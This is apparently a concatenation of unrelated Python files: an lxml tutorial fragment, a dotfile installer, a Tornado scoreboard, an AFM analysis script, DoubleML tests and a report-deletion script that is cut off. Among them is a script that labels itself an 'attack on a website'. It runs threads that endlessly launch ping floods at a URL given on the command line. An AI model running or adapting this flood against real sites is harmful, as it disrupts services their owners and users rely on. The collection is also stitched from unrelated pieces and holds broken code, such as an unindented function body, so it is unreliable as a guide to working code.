print link.keys()
# ['href', 'rel', 'type']
print link.items()
# [('href', 'mystyle.css'), ('rel', 'stylesheet'), ('type', 'text/css')]
print link.get('type')
# text/css
print link.attrib['type']
# text/css
# find the text inside a specific element
print root.findtext('body/p')
# this is first paragraph
# xpath expression
# find an Element anywhere in the tree
# (when searching on individual elements, the path must not start with a slash.
# you can add a leading period(.), if necessary)
print root.find('.//p').text
# this is first paragraph
print doc.find('//p').text
# this is first paragraph
for p in root.xpath('//p'):
    print p.text
# this is first paragraph
# this is second paragraph
# (Note that the text, tail and children of an Element are not necessarily there
# yet when receiving the start event. Only the end event guarantees that the Element
# has been parsed completely.)
for event, element in etree.iterparse('home.xml', events = ('start', 'end'), tag = 'body'):
    print event, element.tag
# start body
# end body
# Utilities for installing sbp_linux_config on a machine.
import os
import os.path as p
import shutil
import stat
import string
import sys
import subprocess
# Build the set of paths used by sbp_linux_config during installation.
HOME = os.getenv('HOME')
assert len(HOME) > 0
SBP = p.join(HOME, 'sbp')
# Most of the results of the installation process are placed here and then
# symlinked to as appropriate. The three main things I put in ~/sbp/bin:
#   dotfiles - targets of .symlinks in ~
#   scripts - executables to be placed on $PATH
#   python - libraries to be placed on $PYTHONPATH
BIN = p.join(SBP, 'bin')
DOTFILES_BIN = p.join(BIN, 'dotfiles')
SCRIPTS_BIN = p.join(BIN, 'scripts')
PYTHON_BIN = p.join(BIN, 'python')
# Checkout of this repository; common-text holds the machine-independent
# config sources that StandardInstallation copies into BIN.
SBP_LINUX_CONFIG = p.join(SBP, 'sbp_linux_config')
COMMON_TEXT = p.join(SBP_LINUX_CONFIG, 'common-text')
# Some config files of special significance.
I3_CONF = p.join(BIN, 'dotfiles/i3/config')
TERMINATOR_CONF = p.join(BIN, 'dotfiles/config/terminator/config')
APPLY_MATE_SETTINGS = p.join(BIN, 'scripts/apply-sbp-mate-settings')
# Standard Go binaries to install.  Keys are destination names placed on
# PATH; values are the built source paths to copy from.
INSTALL_BINARIES = {
    'back-impl': './sbpgo/back_main',
    'format-percent': './sbpgo/format_percent_main',
    'i3blocks-netusage': './sbpgo/network_usage_main',
    'i3blocks-pad': './sbpgo/i3blocks_pad_main',
    'i3blocks-recolor': './sbpgo/i3blocks_recolor_main',
    'sbp-prompt': './sbpgo/prompt_main',
    'vsleep': './sbpgo/sleep_main',
}
# Utility methods for manipulating config files.
def ReadFile(name):
    """Return the entire contents of the named file as a string."""
    with open(name) as handle:
        return handle.read()
def WriteFile(name, text):
    """Overwrite the named file with the given text."""
    with open(name, 'w') as handle:
        handle.write(text)
def InsertBefore(text, afterLine, newLine):
    """ Inserts newLine into text, right before the first occurrence of
    afterLine, and returns the joined result.

    Raises ValueError if afterLine is not present.  (The original
    `assert lineNum >= 0` was dead code: list.index never returns a
    negative value -- it raises ValueError when the item is missing.)
    """
    lines = text.splitlines()
    lines.insert(lines.index(afterLine), newLine)
    return '\n'.join(lines)
def ConcatLines(a, b):
"""Concatenates the lines of text from 'a' and 'b'."""
# Separate a and b by a blank line.
lines = a.splitlines() + [''] + b.splitlines()
return '\n'.join(lines)
def ForceLink(target, linkName):
    """ Forces a symlink, even if the linkName already exists. """
    # Replace an existing file or symlink, but never a directory -- it's
    # too easy to blow away real config folders that way.
    removable = p.islink(linkName) or p.isfile(linkName)
    if removable:
        os.remove(linkName)
    print('Linking %s' % linkName)
    os.symlink(target, linkName)
def InstallBinary(src, dest):
    """Copy src to dest and mark it user-executable, as apparently Bazel
    doesn't always set the execute bit automatically."""
    print('Copying %s' % dest)
    shutil.copyfile(src, dest)
    mode = os.stat(dest).st_mode
    os.chmod(dest, mode | stat.S_IXUSR)
# Recursive helper for linking over individual files in the tree rooted at
# dotfiles.
def LinkDotfiles(targetDir, linkDir, addDot):
    """Mirror targetDir into linkDir: directories are created for real and
    recursed into, files become symlinks back into targetDir.

    When addDot is true, entries at this level get a leading '.'; the
    recursion never adds further dots.
    """
    if not p.exists(linkDir):
        print('Creating %s' % linkDir)
        os.mkdir(linkDir)
    for childName in os.listdir(targetDir):
        targetChild = p.join(targetDir, childName)
        linkChild = p.join(linkDir, ('.' + childName) if addDot else childName)
        if p.isfile(targetChild):
            ForceLink(targetChild, linkChild)
        elif p.isdir(targetChild):
            LinkDotfiles(targetChild, linkChild, False)
def StandardInstallation(appendDirs, install_binaries):
    """ Invokes the standard install procedure.
    1. Copies everything from ~/sbp/sbp_linux_config/text to ~/sbp/bin.
    2. Makes several symlinks in standard places (such as ~) that point
       to the appropriate files in ~/sbp/bin.
    3. If arguments are provided, each is interpreted as a directory which
       may contain zero or more subdirectories corresponding to the
       subdirectories of ~/sbp/sbp_linux_config/text. Each file in each of these
       directories is read in and appended to the corresponding file in
       ~/sbp/bin. If no such file exists yet in ~/sbp/bin, it is created with
       the appended contents. This provides a simple mechanism for adding
       per-machine customizations.
    4. Installs binaries from 'install_binaries'. Keys are destination names;
       values are paths to copy from.
    """
    # Clean out any existing bin stuff.
    if p.isdir(BIN):
        shutil.rmtree(BIN)
    # Perform the copy.
    shutil.copytree(COMMON_TEXT, BIN)
    # Process arguments to see if they contain append-files.
    for appendDir in appendDirs:
        if not p.exists(appendDir):
            print('Skipping non-existent appendDir: %s' % appendDir)
            continue
        assert p.isdir(appendDir), appendDir
        # Look at every file in the appendDir.
        for root, dirs, files in os.walk(appendDir):
            # Make root relative to the appendDir, since we'll want to use it both in
            # the appendDir and in BIN.
            root = p.relpath(root, appendDir)
            for fil in files:
                # Compute the full path from the appendDir to the file.
                fil = p.join(root, fil)
                appendSource = p.join(appendDir, fil)
                appendDest = p.join(BIN, fil)
                if p.exists(appendDest):
                    print('Appending %s' % appendSource)
                    with open(appendDest) as f:
                        text = f.read()
                    # Guarantee at least one blank line separates the
                    # original contents from the appended chunk.
                    while not text.endswith('\n\n'):
                        text += '\n'
                    with open(appendSource) as f:
                        text += f.read()
                    with open(appendDest, 'w') as f:
                        f.write(text)
                else:
                    print('Copying %s' % appendSource)
                    # Make sure the target directory exists.
                    destDir, _ = p.split(appendDest)
                    if not p.exists(destDir):
                        os.makedirs(destDir)
                    shutil.copy(appendSource, appendDest)
    # Link over dotfiles.
    LinkDotfiles(DOTFILES_BIN, HOME, True)
    # Link in all the other scripts that should be on the path.
    ForceLink(SCRIPTS_BIN, p.join(HOME, 'bin'))
    ForceLink(PYTHON_BIN, p.join(HOME, 'python'))
    # Configure cron.
    print("Installing .crontab")
    subprocess.call(['crontab', p.join(HOME, '.crontab')])
    # Install binaries.
    for dest in install_binaries:
        InstallBinary(install_binaries[dest], p.join(SCRIPTS_BIN, dest))
def LaptopInstallation():
    """ Meant to be invoked after StandardInstallation() for laptops. Adds some
    useful configuration settings for laptops.
    """
    # 15pt monospace -- presumably sized for high-DPI laptop panels.
    SetMonospaceFontSize(15)
def SetMonospaceFontSize(size):
    """Rewrite the terminator and MATE configs so the monospace font uses
    the given point size (replacing the checked-in 'Ubuntu Mono 15')."""
    replacement = 'Ubuntu Mono %d' % size
    for path, label in ((TERMINATOR_CONF, 'terminator font size'),
                        (APPLY_MATE_SETTINGS, 'system monospace font size')):
        contents = ReadFile(path)
        print('Setting %s' % label)
        WriteFile(path, contents.replace('Ubuntu Mono 15', replacement))
|
#-*- coding: utf-8 -*-
import tornado.web, tornado.httpserver, tornado.ioloop
import pymongo
class MainHandler(tornado.web.RequestHandler):
    """Serve the scoreboard page: read contestant documents from MongoDB,
    rank them by problem count and lay them out in 150-row columns."""

    def get(self):
        # NOTE(review): Application stores a bare MongoClient in db; .find()
        # normally lives on a collection -- confirm the intended target.
        data = self.application.db.find()
        # BUG FIX: `tat` was initialised as a dict (which has no append) and
        # the append argument was two adjacent dict literals (a syntax
        # error); build a list with one record per document instead.
        tat = []
        for tt in data:
            tat.append({'name': tt['name'],
                        'num': tt['num'],
                        'solved': tt['solved'],
                        'solving': tt['solving'],
                        })
        # Rank by number of problems, descending; ranks are 1-based strings.
        tat.sort(key=lambda x: x['num'], reverse=True)
        for i in range(0, len(tat)):
            tat[i]['rank'] = str(i + 1)
        # Split the ranked rows into columns of at most 150 entries each:
        # qaq[r] holds rows r, r+150, r+300, ...
        qaq = []
        al = len(tat)
        col_num = (len(tat) + 149) // 150
        for r in range(0, min(150, al)):
            tmp = []
            i = r
            while i < al:
                tmp.append(tat[i])
                i += 150
            qaq.append(tmp)
        self.render('index.html', data=qaq, col_num=col_num)
class Application(tornado.web.Application):
    # Tornado wiring: a single route, template directory, and a Mongo handle
    # shared with handlers via self.application.db.
    def __init__(self):
        handlers=[(r'/', MainHandler),
                  ]
        settings={'template_path': 'templates',
                  'debug': True,
                  }
        # NOTE(review): this stores a MongoClient, not a database or
        # collection, yet MainHandler calls self.application.db.find() --
        # confirm which collection was intended.
        self.db=pymongo.MongoClient()
        tornado.web.Application.__init__(self, handlers, **settings)
if __name__ == '__main__':
    server=tornado.httpserver.HTTPServer(Application())
    # NOTE(review): the port is passed as the string '5050'; an int is the
    # documented type for listen() -- confirm this works on the deployed
    # tornado version.
    server.listen('5050')
    tornado.ioloop.IOLoop.instance().start()
# Jonathan wants me to average some pixels
# He gave me a newly made directory of png files spit out of my program to identify the data, instead of the data files themselves.
# I will have to identify the data files like this ..
import os
from matplotlib.widgets import RectangleSelector
import pandas as pd
from afm_analysis import *
# Short aliases used throughout this script.
psplit = os.path.split
pjoin = os.path.join
# All derived artifacts (summary CSV, per-region CSVs, figures) land here.
outputdir = '2017-10-11_Pressure_Analysis'
if not os.path.isdir(outputdir):
    os.makedirs(outputdir)
# I selected the relevant data from the original data files in the past, but the code to do it again is still here
dataframefile = pjoin(outputdir, 'Scan_Data.pd')
if os.path.isfile(dataframefile):
    # Cached subset from a previous run.
    df = pd.read_pickle(dataframefile)
else:
    # Need to generate the data
    '''
    interest = []
    for root, dirs, files in os.walk(r'X:\emrl\Pool\Bulletin\Rupp\AFM Tyler Height Evaluation'):
        for f in files:
            if f.endswith('.png'):
                interest.append(os.path.join(root, f))
    '''
    # Hand-picked png exports identifying the scans of interest.
    interest = ['X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 06 27\\105212_15_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 06 27\\105212_21_1_r.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 06 27\\105212_28_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 06 27\\145141_7_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 04\\135243_7_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\101901_10_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\101901_20_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\101901_25_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\134017_13_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 11\\134017_7_2.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 07 18\\094054_10_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 08 02\\143931_16_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 08 02\\143931_18_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 08 02\\143931_25_1.png',
                'X:\\emrl\\Pool\\Bulletin\\Rupp\\AFM Tyler Height Evaluation\\2017 08 02\\143931_7_1.png']
    # Scan id = png name minus '.png'; strip('_r') also drops the '_r'
    # suffix (char-set strip -- works here because ids end in digits).
    ids = [psplit(fn)[-1][:-4].strip('_r') for fn in interest]
    # Even the date string is a completely different format. Make old format from new format.
    # Christ ...
    dates = [psplit(psplit(fp)[0])[-1].split(' ') for fp in interest]
    monthnames = ['', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
    datestrings = ['-'.join((d[2], monthnames[int(d[1])], d[0])) for d in dates]
    # Or could just find the files in the original data folders by brute force...
    '''
    pngfns = [psplit(fp)[-1] for fp in interest]
    pngorigin = []
    for pngfn in pngfns:
        for root, dirs, files in os.walk('C:\\t\\LCAFM'):
            for f in files:
                if f == pngfn:
                    pngorigin.append(pjoin(root, f))
    '''
    # Load all the dataframes containing the images of interest
    datafolders = np.unique(datestrings)
    dframes = {}
    for datafolder in datafolders:
        datafile = pjoin(r'C:\t\LCAFM', datafolder, datafolder + '.df')
        dframes[datafolder] = pd.read_pickle(datafile)
    # Make a new dataframe containing only the images of interest
    dflist = []
    for id, datestring in zip(ids, datestrings):
        datedf = dframes[datestring]
        dflist.append(datedf[datedf.id == id][datedf.type == 'xy'])
    df = pd.concat(dflist)
    df.to_pickle(dataframefile)
df = df[df.type == 'xy'].dropna(how='all')
# Drop the first and last 5 rows of each scan, then subtract the fitted
# plane and scale by 1e9.  NOTE(review): presumably meters -> nm -- confirm
# against afm_analysis.fitplane.
df['scan'] = df['scan'].apply(lambda s: s[5:-5])
df['scan2'] = df['scan2'].apply(lambda s: s[5:-5])
df['corrscan'] = df['scan'].apply(lambda s: 1e9 * (s - fitplane(s)))
df['corrscan2'] = df['scan2'].apply(lambda s: 1e9 * (s - fitplane(s)))
summaryfile = pjoin(outputdir, 'Region_stats.csv')
with open(summaryfile, 'w') as f:
    # Write a header
    # Data gets written afterward
    f.write('id,region,imin,imax,jmin,jmax,topo_mean,topo_max,topo_min,topo_std,current_mean,current_min,current_max,current_std\n')
# Group by measurement of interest: for each scan, let the user drag
# rectangles over regions, annotate them live, then dump per-region stats.
for k, g in df.groupby('id'):
    breakloop = False
    plot_cafm(g, scaleaxes=False)
    fig = gcf()
    topoax, currentax, _, _ = fig.get_axes()
    currentdata = g[g['channel_name'] == 'I'].iloc[0].scan
    topodata = g[g['channel_name'] == 'Z'].iloc[0].corrscan
    height_pix, width_pix = shape(topodata)
    width_nm = g.iloc[0].width
    height_nm = g.iloc[0].height

    # pixels were converted to nm, this converts back
    def convert_nm_to_pix(xnm, ynm):
        xpix = width_pix / 2 + xnm * width_pix / width_nm / 1e9
        ypix = height_pix / 2 - ynm * height_pix / height_nm / 1e9
        return (int(ypix), int(xpix))

    vertices = []
    slices = []
    n = 0

    def onselect(eclick, erelease):
        """Record the dragged rectangle and annotate both axes with the
        region number and its mean value."""
        global n
        # Axes are plotted directly in pixels, so only int truncation is
        # needed (the dead nm->pixel conversion was removed).
        x0, y0 = eclick.xdata, eclick.ydata
        x1, y1 = erelease.xdata, erelease.ydata
        xmin, xmax = min(x0, x1), max(x0, x1)
        ymin, ymax = min(y0, y1), max(y0, y1)
        # Arrays are indexed (row, col) = (y, x).
        imin, imax = int(ymin), int(ymax)
        jmin, jmax = int(xmin), int(xmax)
        vertices.append((imin, imax, jmin, jmax))
        slices.append(np.s_[imin:imax, jmin:jmax])
        xmid = (x0 + x1) / 2
        ymid = (y0 + y1) / 2
        # Draw rectangles and put some information there
        bbox = {'facecolor': 'black', 'alpha': .5}
        currentax.add_patch(Rectangle((x0, y0), x1 - x0, y1 - y0, fill=False, color='white'))
        meancurrent = np.mean(currentdata[slices[-1]]) * 1e9
        currentax.text(xmid, ymid, '{}\n{:.4f}'.format(n, meancurrent), color='white', bbox=bbox, horizontalalignment='center', verticalalignment='center')
        topoax.add_patch(Rectangle((x0, y0), x1 - x0, y1 - y0, fill=False, color='white'))
        meantopo = np.mean(topodata[slices[-1]])
        topoax.text(xmid, ymid, '{}\n{:.4f}'.format(n, meantopo), color='white', bbox=bbox, horizontalalignment='center', verticalalignment='center')
        n += 1

    def selector(event):
        """Keyboard handler: 'n' advances to the next measurement, 'q'
        stops the whole loop."""
        # BUG FIX: breakloop must be declared global here -- the original
        # assignment created a function-local, so pressing 'q' never
        # stopped the outer loop (hence the old "break doesn't break"
        # comment).
        global breakloop
        if event.key in ['N', 'n'] and selector.RS1.active:
            print('Next measurement ...')
            selector.RS1.set_active(False)
            selector.RS2.set_active(False)
        if event.key in ['Q', 'q']:
            breakloop = True
            selector.RS1.set_active(False)
            selector.RS2.set_active(False)

    selector.RS1 = RectangleSelector(topoax, onselect)
    selector.RS2 = RectangleSelector(currentax, onselect)
    connect('key_press_event', selector)
    # Block until the user deactivates the selectors ('n' or 'q').
    while selector.RS1.active:
        plt.pause(.5)
    if breakloop:
        break
    # Write files
    measurement_id = g.id.iloc[0]
    fig.savefig(pjoin(outputdir, measurement_id + '.png'))
    # Rectangle vertices in pixels and in nm
    #savetxt(pjoin(outputdir, measurement_id + '_vertices_nm.csv'))
    # Append one stats row per selected region to the summary CSV, and dump
    # the raw region data as individual CSV files.
    with open(summaryfile, 'a') as f:
        for region, (window, vert) in enumerate(zip(slices, vertices)):
            imin, imax, jmin, jmax = vert
            toposlice = topodata[window]
            currentslice = currentdata[window]
            flattopo = toposlice.flatten()
            flatcurrent = currentslice.flatten()
            meantopo = np.mean(flattopo)
            meancurrent = np.mean(flatcurrent)
            maxtopo = np.max(flattopo)
            maxcurrent = np.max(flatcurrent)
            mintopo = np.min(flattopo)
            mincurrent = np.min(flatcurrent)
            stdtopo = np.std(flattopo)
            stdcurrent = np.std(flatcurrent)
            paramlist = [measurement_id, region, imin, imax, jmin, jmax, meantopo, maxtopo, mintopo, stdtopo, meancurrent, mincurrent, maxcurrent, stdcurrent]
            paramstring = ','.join([format(thing) for thing in paramlist]) + '\n'
            f.write(paramstring)
            topopath = pjoin(outputdir, measurement_id + '_topo_region_{:02}.csv'.format(region))
            currentpath = pjoin(outputdir, measurement_id + '_current_region_{:02}.csv'.format(region))
            np.savetxt(topopath, toposlice, delimiter=',')
            np.savetxt(currentpath, currentslice, delimiter=',')
# for troubleshooting when onselect has an error and RectangleSelector does not show it
'''
class dummyclick(object):
def __init__(self, x, y):
self.xdata = x
self.ydata = y
onselect(dummyclick(0, 0), dummyclick(1,1))
'''
|
# Prints a dictionary of the count of each character in the given string
# No comparison is performed, must be checked by eye. Or just implement the
# comparison, whatever is easier ¯\_(ツ)_/¯
from collections import OrderedDict
def check(s):
    """Return an OrderedDict mapping each character of s to its count,
    keyed in first-seen order."""
    counts = OrderedDict()
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return counts
def main():
    """Tally the characters of two hex digests and print both counts for
    eyeball comparison."""
    digest_a = "80f82fc0e320fe3e2aba1e15644ee6d5622a5f463f7145dd0b74caa3898e9f0f"
    digest_b = "83538ab1c15f7a89050be8dbdf7f99cfc31cf501bbf4625992e067391f44599f"
    print(check(digest_a))
    print(check(digest_b))


if __name__ == "__main__":
    main()
|
import pytest
import numpy as np
from doubleml import DoubleMLPLR, DoubleMLIRM, DoubleMLIIVM, DoubleMLPLIV
from doubleml.datasets import make_plr_CCDDHNR2018, make_irm_data, make_pliv_CHS2015, make_iivm_data
from sklearn.linear_model import Lasso, LogisticRegression
# Deterministic synthetic data sets, one per DoubleML model class.
np.random.seed(3141)
dml_data_plr = make_plr_CCDDHNR2018(n_obs=100)
dml_data_pliv = make_pliv_CHS2015(n_obs=100, dim_z=1)
dml_data_irm = make_irm_data(n_obs=100)
dml_data_iivm = make_iivm_data(n_obs=100)
# Reference fits using the built-in (string) scores.
dml_plr = DoubleMLPLR(dml_data_plr, Lasso(), Lasso())
dml_plr.fit()
dml_pliv = DoubleMLPLIV(dml_data_pliv, Lasso(), Lasso(), Lasso())
dml_pliv.fit()
dml_irm = DoubleMLIRM(dml_data_irm, Lasso(), LogisticRegression())
dml_irm.fit()
dml_iivm = DoubleMLIIVM(dml_data_iivm, Lasso(), LogisticRegression(), LogisticRegression())
dml_iivm.fit()
# fit models with callable scores
# Each callable-score model reuses the reference model's sample splits so
# the results are directly comparable; predictions are stored so the tests
# below can re-evaluate the score functions by hand.
plr_score = dml_plr._score_elements
dml_plr_callable_score = DoubleMLPLR(dml_data_plr, Lasso(), Lasso(),
                                     score=plr_score, draw_sample_splitting=False)
dml_plr_callable_score.set_sample_splitting(dml_plr.smpls)
dml_plr_callable_score.fit(store_predictions=True)
irm_score = dml_irm._score_elements
dml_irm_callable_score = DoubleMLIRM(dml_data_irm, Lasso(), LogisticRegression(),
                                     score=irm_score, draw_sample_splitting=False)
dml_irm_callable_score.set_sample_splitting(dml_irm.smpls)
dml_irm_callable_score.fit(store_predictions=True)
iivm_score = dml_iivm._score_elements
dml_iivm_callable_score = DoubleMLIIVM(dml_data_iivm, Lasso(), LogisticRegression(), LogisticRegression(),
                                       score=iivm_score, draw_sample_splitting=False)
dml_iivm_callable_score.set_sample_splitting(dml_iivm.smpls)
dml_iivm_callable_score.fit(store_predictions=True)
@pytest.mark.ci
@pytest.mark.parametrize('dml_obj',
                         [dml_plr, dml_pliv, dml_irm, dml_iivm])
def test_linear_score(dml_obj):
    """The score must be linear in the parameter: psi = psi_a * coef + psi_b."""
    reconstructed = dml_obj.psi_a * dml_obj.coef + dml_obj.psi_b
    assert np.allclose(dml_obj.psi, reconstructed, rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_plr_callable_vs_str_score():
    """A callable PLR score must reproduce the built-in string score."""
    for reference, candidate in ((dml_plr.psi, dml_plr_callable_score.psi),
                                 (dml_plr.coef, dml_plr_callable_score.coef)):
        assert np.allclose(reference, candidate, rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_plr_callable_vs_pred_export():
    """Evaluating the PLR score on the exported nuisance predictions must
    reproduce the fitted score elements."""
    preds = dml_plr_callable_score.predictions
    g_hat, m_hat = (preds[key].squeeze() for key in ('ml_g', 'ml_m'))
    psi_a, psi_b = plr_score(dml_data_plr.y, dml_data_plr.d,
                             g_hat, m_hat,
                             dml_plr_callable_score.smpls[0])
    for reference, candidate in ((dml_plr.psi_a, psi_a),
                                 (dml_plr.psi_b, psi_b)):
        assert np.allclose(reference.squeeze(), candidate, rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_irm_callable_vs_str_score():
    """A callable IRM score must reproduce the built-in string score."""
    for reference, candidate in ((dml_irm.psi, dml_irm_callable_score.psi),
                                 (dml_irm.coef, dml_irm_callable_score.coef)):
        assert np.allclose(reference, candidate, rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_irm_callable_vs_pred_export():
    """Evaluating the IRM score on the exported nuisance predictions must
    reproduce the fitted score elements."""
    preds = dml_irm_callable_score.predictions
    g_hat0, g_hat1, m_hat = (preds[key].squeeze()
                             for key in ('ml_g0', 'ml_g1', 'ml_m'))
    psi_a, psi_b = irm_score(dml_data_irm.y, dml_data_irm.d,
                             g_hat0, g_hat1, m_hat,
                             dml_irm_callable_score.smpls[0])
    for reference, candidate in ((dml_irm.psi_a, psi_a),
                                 (dml_irm.psi_b, psi_b)):
        assert np.allclose(reference.squeeze(), candidate, rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_iivm_callable_vs_str_score():
    """A callable IIVM score must reproduce the built-in string score."""
    for reference, candidate in ((dml_iivm.psi, dml_iivm_callable_score.psi),
                                 (dml_iivm.coef, dml_iivm_callable_score.coef)):
        assert np.allclose(reference, candidate, rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_iivm_callable_vs_pred_export():
    """Evaluating the IIVM score on the exported nuisance predictions must
    reproduce the fitted score elements."""
    preds = dml_iivm_callable_score.predictions
    g_hat0, g_hat1, m_hat, r_hat0, r_hat1 = (
        preds[key].squeeze()
        for key in ('ml_g0', 'ml_g1', 'ml_m', 'ml_r0', 'ml_r1'))
    psi_a, psi_b = iivm_score(dml_data_iivm.y, dml_data_iivm.z.squeeze(), dml_data_iivm.d,
                              g_hat0, g_hat1, m_hat, r_hat0, r_hat1,
                              dml_iivm_callable_score.smpls[0])
    for reference, candidate in ((dml_iivm.psi_a, psi_a),
                                 (dml_iivm.psi_b, psi_b)):
        assert np.allclose(reference.squeeze(), candidate, rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_pliv_callable_vs_str_score():
    """A callable PLIV score must reproduce the built-in string score."""
    pliv_score = dml_pliv._score_elements
    refit = DoubleMLPLIV(dml_data_pliv, Lasso(), Lasso(), Lasso(),
                         score=pliv_score, draw_sample_splitting=False)
    refit.set_sample_splitting(dml_pliv.smpls)
    refit.fit()
    for reference, candidate in ((dml_pliv.psi, refit.psi),
                                 (dml_pliv.coef, refit.coef)):
        assert np.allclose(reference, candidate, rtol=1e-9, atol=1e-4)
@pytest.mark.ci
def test_pliv_callable_not_implemented():
    """Callable scores are rejected for the partialX (multi-instrument),
    partialZ and partialXZ variants of DoubleMLPLIV."""
    np.random.seed(3141)
    dml_data_pliv_2z = make_pliv_CHS2015(n_obs=100, dim_z=2)
    pliv_score = dml_pliv._score_elements
    # Builders are lazy so each model is constructed right before fitting,
    # matching the original construct/fit interleaving.
    for builder, suffix in (
            (lambda: DoubleMLPLIV._partialX(dml_data_pliv_2z, Lasso(), Lasso(), Lasso(),
                                            score=pliv_score),
             'partialX with several instruments.'),
            (lambda: DoubleMLPLIV._partialZ(dml_data_pliv_2z, Lasso(),
                                            score=pliv_score),
             'partialZ.'),
            (lambda: DoubleMLPLIV._partialXZ(dml_data_pliv_2z, Lasso(), Lasso(), Lasso(),
                                             score=pliv_score),
             'partialXZ.')):
        msg = 'Callable score not implemented for DoubleMLPLIV.' + suffix
        with pytest.raises(NotImplementedError, match=msg):
            builder().fit()
|
from .CreateEditDelete import CreateEditDelete, DeleteReference
class Delete(CreateEditDelete):
    """Undo-stack action that deletes one map object, or a list of them."""
    Name = "Delete Object(s)"

    def __init__(self, mapObject):
        CreateEditDelete.__init__(self)
        # Normalise the argument to a list so both call styles share a path.
        objects = mapObject if isinstance(mapObject, list) else [mapObject]
        for obj in objects:
            self.delete(DeleteReference(obj))
|
# This script does multithreading system calls to attack on a website
import threading
import subprocess
import sys
# Serialises stdout so the per-thread greeting lines don't interleave.
lock = threading.Lock()
# PIDs of every spawned ping subprocess, for cleanup on Ctrl-C.
threads = []
def worker(name, url):
    """Endlessly spawn `ping` subprocesses against url from one thread.

    Records each child's pid in the module-level `threads` list so the
    main thread can kill them on shutdown.
    """
    while True:
        try:
            # `with lock` guarantees the lock is released even if print raises.
            with lock:
                print(f"Thread {name}: Hello, It is working")
            # BUG FIX: the original passed '&&' and an echo command as extra
            # argv entries to ping (a list argv is never shell-interpreted),
            # and its bare `except:` clause had no body (a SyntaxError).
            process = subprocess.Popen(['ping', '-s', '128', url])
            threads.append(process.pid)
        except OSError:
            # Process creation can fail transiently; keep the loop alive.
            continue
class MyThread (threading.Thread):
    """Thread wrapper that runs worker() with a fixed name and target URL."""

    def __init__(self, name, url):
        threading.Thread.__init__(self)
        self.name = name
        self.url = url

    def run(self):
        worker(self.name, self.url)
if __name__ == '__main__':
    url = sys.argv[1]
    try:
        # Spawn two worker threads; each loops forever starting pings.
        for i in range (2):
            MyThread (i, url).start()
    except KeyboardInterrupt :
        # NOTE(review): Ctrl-C is delivered to the main thread only; the
        # worker threads keep running and may spawn new pings after this
        # cleanup -- confirm intended shutdown semantics.
        for id in threads:
            subprocess.call (['kill', str(id)])
        print ("Thank You for using.");
|
#!/usr/bin/python2.7
from optparse import OptionParser
from glob import glob
import os, time, datetime, sys, commands, json, ast, shutil, socket
from copy import deepcopy
from db import AzukiDB as azuki
class deleteReport(object):
    """Deletes saved test reports from disk and regenerates the
    consolidated report data (Python 2 script)."""
    def __init__(self, productName = '', globalPath = '', testBedHostIP = ''):
        """
        Parse and accumulate report data write it in another file for consolidating all reports page.
        param productName: <string> name of the product for which the reports needs to be accumulated.
        """
        self.product = productName.upper()
        self.globalPath = globalPath
        self.testBedHostIP = testBedHostIP
        # Consolidated JSON produced by sharedlib/reportAccumulator.py.
        self.JSONFile = os.path.join(self.globalPath, "report_data.json")
        self.logPath = os.path.join(self.globalPath, self.product, "results")
        self.jsonReportPath = os.path.join(self.logPath, "json_reports")
        self.JSONList = []
    def __generateLog(self):
        # Re-run the accumulator so the consolidated page reflects deletions.
        AzukiDB = azuki()
        report_ip = AzukiDB.getKeyValue('admin', 'reporting_ip')
        if not report_ip:
            # No configured reporting IP: discover this host's outbound
            # address via a UDP "connect" (no traffic is actually sent).
            socket_var = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            socket_var.connect(('google.com', 0))
            report_ip = socket_var.getsockname()[0]
        # Parsing log files
        logFileParserPath = os.path.join( self.globalPath,
                            'sharedlib', 'reportAccumulator.py')
        os.system( '/usr/bin/python '+ logFileParserPath + \
                   ' -g ' + self.globalPath + \
                   ' -H ' + report_ip)
    def delete(self, reportNames):
        """Remove every artifact belonging to each named report, then
        regenerate the consolidated data."""
        if not reportNames:
            print "No report names passed."
            return
        for report in reportNames:
            baseName = report.split('.')[0]
            # Names embed product_user_type__timestamp; user names may
            # themselves contain one underscore, hence the fallback split.
            try:
                prod, user, type, blank, timestamp = baseName.split('_')
            except:
                prod, user1, user2, type, blank, timestamp = baseName.split('_')
                user = "_".join([user1, user2])
            try:
                # remove all the files of same timestamp
                [ os.remove(file) for file in glob(os.path.join( self.logPath, "*%s.*" %(timestamp) )) ]
                # create json_report directory path
                timestamp = datetime.datetime.strftime(datetime.datetime.\
                            strptime(timestamp,\
                            "%Y%m%d-%H%M"), "%Y-%m-%d_%H-%M")
                json_dir_path = os.path.join( self.jsonReportPath, "%s_%s_%s" %( prod, user, timestamp ) )
                # remove json_report directory
